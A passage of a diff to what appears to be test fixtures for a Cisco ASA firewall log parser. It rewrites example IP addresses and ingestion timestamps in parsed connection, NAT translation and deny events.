outbound UDP connection 11783 for outside:100.66.100.4/53 (100.66.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.099344300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -4817,7 +4817,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.100.4", + "mapped_source_ip": "192.168.100.4", "connection_id": "11783", "source_interface": "outside", "mapped_destination_port": 56132 @@ -4839,8 +4839,8 @@ }, "source": { "port": 53, - "address": "100.66.100.4", - "ip": "100.66.100.4" + "address": "192.168.100.4", + "ip": "192.168.100.4" }, "tags": [ "preserve_original_event" @@ -4875,7 +4875,7 @@ "localhost" ], "ip": [ - "100.66.100.4", + "192.168.100.4", "172.31.98.44" ] }, @@ -4885,8 +4885,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721497600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:100.66.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", + "ingested": "2021-12-09T13:34:28.099350Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -4918,8 +4918,8 @@ }, "destination": { "port": 8270, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1457, @@ -4959,7 +4959,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -4967,8 +4967,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721501600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:100.66.98.44/8270", + "ingested": "2021-12-09T13:34:28.099355700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -5001,8 +5001,8 @@ }, "source": { "port": 80, - "address": "100.66.198.40", - "ip": "100.66.198.40" + "address": "192.168.198.40", + "ip": "192.168.198.40" }, "tags": [ "preserve_original_event" @@ -5037,7 +5037,7 @@ "localhost" ], "ip": [ - "100.66.198.40", + "192.168.198.40", "172.31.98.44" ] }, @@ -5046,8 +5046,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721505800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457)", + "ingested": "2021-12-09T13:34:28.099361500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -5063,7 +5063,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.198.40", + "mapped_source_ip": "192.168.198.40", "connection_id": "11784", "source_interface": "outside", "mapped_destination_port": 1457 @@ -5080,8 +5080,8 @@ }, "destination": { "port": 8271, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1458, @@ -5121,7 +5121,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -5129,8 +5129,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721510Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:100.66.98.44/8271", + "ingested": "2021-12-09T13:34:28.099367200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -5163,8 +5163,8 @@ }, "source": { "port": 80, - "address": "100.66.198.40", - "ip": "100.66.198.40" + "address": "192.168.198.40", + "ip": "192.168.198.40" }, "tags": [ "preserve_original_event" @@ -5199,7 +5199,7 @@ "localhost" ], "ip": [ - "100.66.198.40", + "192.168.198.40", "172.31.98.44" ] }, @@ -5208,8 +5208,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721515600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458)", + "ingested": "2021-12-09T13:34:28.099373Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -5225,7 +5225,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.198.40", + "mapped_source_ip": "192.168.198.40", "connection_id": "11785", "source_interface": "outside", "mapped_destination_port": 1458 @@ -5247,8 +5247,8 @@ }, "source": { "port": 53, - "address": "100.66.1.107", - "ip": "100.66.1.107" + "address": "192.168.1.107", + "ip": "192.168.1.107" }, "tags": [ "preserve_original_event" @@ -5283,7 +5283,7 @@ "localhost" ], "ip": [ - "100.66.1.107", + "192.168.1.107", "172.31.98.44" ] }, @@ -5292,8 +5292,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721520Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:100.66.1.107/53 (100.66.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.099378800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:192.168.1.107/53 (192.168.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -5309,7 +5309,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.1.107", + "mapped_source_ip": "192.168.1.107", "connection_id": "11786", "source_interface": "outside", "mapped_destination_port": 56132 @@ -5331,8 +5331,8 @@ }, "source": { "port": 80, - "address": "100.66.198.40", - "ip": "100.66.198.40" + "address": "192.168.198.40", + "ip": "192.168.198.40" }, "tags": [ "preserve_original_event" @@ -5367,7 +5367,7 @@ "localhost" ], "ip": [ - "100.66.198.40", + "192.168.198.40", "172.31.98.44" ] }, @@ -5378,8 +5378,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.721524800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:100.66.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs", + "ingested": "2021-12-09T13:34:28.099382900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:192.168.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -5411,8 +5411,8 @@ }, "destination": { "port": 8272, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1459, @@ -5452,7 +5452,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -5460,8 +5460,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721529300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:100.66.98.44/8272", + "ingested": "2021-12-09T13:34:28.099387500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -5494,8 +5494,8 @@ }, "source": { "port": 80, - "address": "100.66.198.40", - "ip": "100.66.198.40" + "address": "192.168.198.40", + "ip": "192.168.198.40" }, "tags": [ "preserve_original_event" @@ -5530,7 +5530,7 @@ "localhost" ], "ip": [ - "100.66.198.40", + "192.168.198.40", "172.31.98.44" ] }, @@ -5539,8 +5539,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721534200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459)", + "ingested": "2021-12-09T13:34:28.099392600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -5556,7 +5556,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.198.40", + "mapped_source_ip": "192.168.198.40", "connection_id": "11787", "source_interface": "outside", "mapped_destination_port": 1459 @@ -5578,8 +5578,8 @@ }, "source": { "port": 53, - "address": "100.66.1.107", - "ip": "100.66.1.107" + "address": "192.168.1.107", + "ip": "192.168.1.107" }, "tags": [ "preserve_original_event" @@ -5614,7 +5614,7 @@ "localhost" ], "ip": [ - "100.66.1.107", + "192.168.1.107", "172.31.98.44" ] }, @@ -5624,8 +5624,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721538600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:100.66.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375", + "ingested": "2021-12-09T13:34:28.099397400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:192.168.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -5657,8 +5657,8 @@ }, "destination": { "port": 8273, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1460, @@ -5698,7 +5698,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -5706,8 +5706,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721543Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:100.66.98.44/8273", + "ingested": "2021-12-09T13:34:28.099403200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -5740,8 +5740,8 @@ }, "source": { "port": 80, - "address": "100.66.192.44", - "ip": "100.66.192.44" + "address": "192.168.192.44", + "ip": "192.168.192.44" }, "tags": [ "preserve_original_event" @@ -5776,7 +5776,7 @@ "localhost" ], "ip": [ - "100.66.192.44", + "192.168.192.44", "172.31.98.44" ] }, @@ -5785,8 +5785,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721547400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:100.66.192.44/80 (100.66.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460)", + "ingested": "2021-12-09T13:34:28.099407500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:192.168.192.44/80 (192.168.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -5802,7 +5802,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.192.44", + "mapped_source_ip": "192.168.192.44", "connection_id": "11788", "source_interface": "outside", "mapped_destination_port": 1460 @@ -5840,8 +5840,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721551500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:100.66.98.44/8267 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.099411800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -5866,8 +5866,8 @@ }, "destination": { "port": 8277, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1385, @@ -5907,7 +5907,7 @@ ], "ip": [ "172.31.156.80", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -5915,8 +5915,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721555600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:100.66.98.44/8277", + "ingested": "2021-12-09T13:34:28.099416200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:192.168.98.44/8277", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -5949,8 +5949,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -5985,7 +5985,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.156.80" ] }, @@ -5994,8 +5994,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721560300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:100.66.19.254/80 (100.66.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385)", + "ingested": "2021-12-09T13:34:28.099422100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:192.168.19.254/80 (192.168.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -6011,7 +6011,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.156.80", - "mapped_source_ip": "100.66.19.254", + "mapped_source_ip": "192.168.19.254", "connection_id": "11797", "source_interface": "outside", "mapped_destination_port": 1385 @@ -6049,8 +6049,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721565Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:100.66.98.44/8268 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.099427800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6096,8 +6096,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721569600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:100.66.98.44/8269 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.099433800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6143,8 +6143,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721574100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:100.66.98.44/8270 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.099439600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6190,8 +6190,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721578600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:100.66.98.44/8271 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.099445400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6237,8 +6237,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721583400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:100.66.98.44/8272 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.099451100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6284,8 +6284,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721588600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:100.66.98.44/8273 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.099456800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6315,8 +6315,8 @@ }, "source": { "port": 80, - "address": "100.66.115.46", - "ip": "100.66.115.46" + "address": "192.168.115.46", + "ip": "192.168.115.46" }, "tags": [ "preserve_original_event" @@ -6351,7 +6351,7 @@ "localhost" ], "ip": [ - "100.66.115.46", + "192.168.115.46", "172.31.156.80" ] }, @@ -6362,8 +6362,8 @@ "severity": 6, "duration": 325000000000, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.721593100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:100.66.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs", + "ingested": "2021-12-09T13:34:28.099462500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:192.168.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:29:31.000Z", @@ -6400,8 +6400,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -6436,7 +6436,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.156.80" ] }, @@ -6447,8 +6447,8 @@ "severity": 6, "duration": 0, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721597800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:100.66.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099468200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:192.168.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -6480,8 +6480,8 @@ }, "destination": { "port": 8278, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1386, @@ -6521,7 +6521,7 @@ ], "ip": [ "172.31.156.80", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -6529,8 +6529,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721603600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:100.66.98.44/8278", + "ingested": "2021-12-09T13:34:28.099490100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:192.168.98.44/8278", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -6563,8 +6563,8 @@ }, "source": { "port": 80, - "address": "100.66.115.46", - "ip": "100.66.115.46" + "address": "192.168.115.46", + "ip": "192.168.115.46" }, "tags": [ "preserve_original_event" @@ -6599,7 +6599,7 @@ "localhost" ], "ip": [ - "100.66.115.46", + "192.168.115.46", "172.31.156.80" ] }, @@ -6608,8 +6608,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721608200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:100.66.115.46/80 (100.66.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386)", + "ingested": "2021-12-09T13:34:28.099512400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:192.168.115.46/80 (192.168.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -6625,7 +6625,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.156.80", - "mapped_source_ip": "100.66.115.46", + "mapped_source_ip": "192.168.115.46", "connection_id": "11798", "source_interface": "outside", "mapped_destination_port": 1386 @@ -6647,8 +6647,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -6682,7 +6682,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -6691,8 +6691,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.721613400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.099518200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -6728,8 +6728,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -6763,7 +6763,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -6772,8 +6772,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.721617600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.099577300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -6809,8 +6809,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -6844,7 +6844,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -6853,8 +6853,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.721621900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.099586Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -6890,8 +6890,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -6925,7 +6925,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -6934,8 +6934,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.721627Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.099590Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -6971,8 +6971,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7006,7 +7006,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7015,8 +7015,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.721631500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.099596200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7052,8 +7052,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7087,7 +7087,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7096,8 +7096,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.721635800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.099601200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7133,8 +7133,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7168,7 +7168,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ 